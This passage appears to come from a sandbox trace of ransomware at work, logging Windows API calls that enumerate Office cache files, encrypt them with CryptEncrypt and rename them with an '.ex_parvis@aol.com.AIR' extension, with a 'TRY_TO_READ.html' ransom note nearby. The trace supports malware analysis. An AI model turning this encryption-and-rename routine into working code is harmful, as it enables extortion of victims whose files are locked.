lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.253] WriteFile (in: hFile=0x484, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.253] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x567) returned 0x387410 [0136.253] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x567) returned 0x387980 [0136.253] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.253] ReadFile (in: hFile=0x484, lpBuffer=0x387410, nNumberOfBytesToRead=0x567, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387410*, lpNumberOfBytesRead=0x2acf9c8*=0x567, lpOverlapped=0x0) returned 1 [0136.253] SetFilePointer (in: hFile=0x484, lDistanceToMove=-1383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.253] WriteFile (in: hFile=0x484, lpBuffer=0x387980*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387980*, lpNumberOfBytesWritten=0x2acf9c8*=0x567, lpOverlapped=0x0) returned 1 [0136.253] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.253] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387980 | out: hHeap=0x2e0000) returned 1 [0136.253] CloseHandle (hObject=0x484) returned 1 [0136.254] GetProcessHeap () returned 0x2e0000 [0136.254] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.254] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0136.254] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.254] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0136.254] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854d0 | out: hHeap=0x2e0000) returned 1 [0136.254] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3854d0 [0136.254] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.254] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.254] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.254] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.254] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", dwFileAttributes=0x80) returned 1 [0136.255] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 79 [0136.255] GetProcessHeap () returned 0x2e0000 [0136.255] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x104) returned 0x387410 [0136.255] lstrcpyW (in: lpString1=0x387410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" [0136.255] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0136.255] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.257] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x484 [0136.257] GetProcessHeap () returned 0x2e0000 [0136.257] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.257] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=873984) returned 1 [0136.257] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd5600 [0136.257] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.257] GetProcessHeap () returned 0x2e0000 [0136.257] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.258] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.258] WriteFile (in: hFile=0x484, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.259] WriteFile (in: hFile=0x484, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.259] WriteFile (in: hFile=0x484, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.259] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd5600) returned 0x30d0020 [0136.260] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd5600) returned 0x31b0020 [0136.260] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.260] ReadFile (in: hFile=0x484, lpBuffer=0x30d0020, nNumberOfBytesToRead=0xd5600, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd5600, lpOverlapped=0x0) returned 1 [0136.291] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dfd8 [0136.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.291] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.291] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0136.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.291] GetLastError () returned 0x0 [0136.291] FindNextFileW (in: hFindFile=0x35dfd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0136.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.291] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.291] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0136.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.291] GetLastError () returned 0x0 [0136.291] FindNextFileW (in: hFindFile=0x35dfd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0136.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.291] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.291] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0136.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.291] GetLastError () returned 0x0 [0136.291] FindNextFileW (in: hFindFile=0x35dfd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0136.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.291] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.291] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0136.291] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.291] GetLastError () returned 0x0 [0136.291] FindNextFileW (in: hFindFile=0x35dfd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0136.292] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0136.292] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.292] GetLastError () returned 0x0 [0136.292] FindNextFileW (in: hFindFile=0x35dfd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0136.292] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0136.292] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.292] GetLastError () returned 0x0 [0136.292] FindNextFileW (in: hFindFile=0x35dfd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971f6d10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0136.292] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0136.292] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.292] GetLastError () returned 0x0 [0136.292] FindNextFileW (in: hFindFile=0x35dfd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971f6d10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.292] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.292] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.292] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0136.293] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0136.293] GetProcessHeap () returned 0x2e0000 [0136.293] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x387410 [0136.293] lstrcpyW (in: lpString1=0x387410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" [0136.293] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0136.293] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.295] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488 [0136.295] GetProcessHeap () returned 0x2e0000 [0136.295] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.295] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1852) returned 1 [0136.295] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x73c [0136.295] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.296] GetProcessHeap () returned 0x2e0000 [0136.296] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.296] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.296] WriteFile (in: hFile=0x488, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.297] WriteFile (in: hFile=0x488, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.297] WriteFile (in: hFile=0x488, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.297] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x73c) returned 0x387410 [0136.297] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x73c) returned 0x387b58 [0136.297] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.297] ReadFile (in: hFile=0x488, lpBuffer=0x387410, nNumberOfBytesToRead=0x73c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387410*, lpNumberOfBytesRead=0x2acf9c8*=0x73c, lpOverlapped=0x0) returned 1 [0136.297] SetFilePointer (in: hFile=0x488, lDistanceToMove=-1852, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.298] WriteFile (in: hFile=0x488, lpBuffer=0x387b58*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x73c, lpOverlapped=0x0) returned 1 [0136.298] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.298] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387b58 | out: hHeap=0x2e0000) returned 1 [0136.298] CloseHandle (hObject=0x488) returned 1 [0136.298] GetProcessHeap () returned 0x2e0000 [0136.298] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.298] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0136.298] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.298] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0136.298] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0136.298] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0136.298] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.298] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.299] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.299] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.299] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", dwFileAttributes=0x80) returned 1 [0136.299] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 79 [0136.299] GetProcessHeap () returned 0x2e0000 [0136.299] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x104) returned 0x387410 [0136.299] lstrcpyW (in: lpString1=0x387410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" [0136.299] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0136.299] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.301] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488 [0136.301] GetProcessHeap () returned 0x2e0000 [0136.301] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.301] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1231) returned 1 [0136.301] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x4cf [0136.301] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.301] GetProcessHeap () returned 0x2e0000 [0136.301] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.301] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.302] WriteFile (in: hFile=0x488, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, 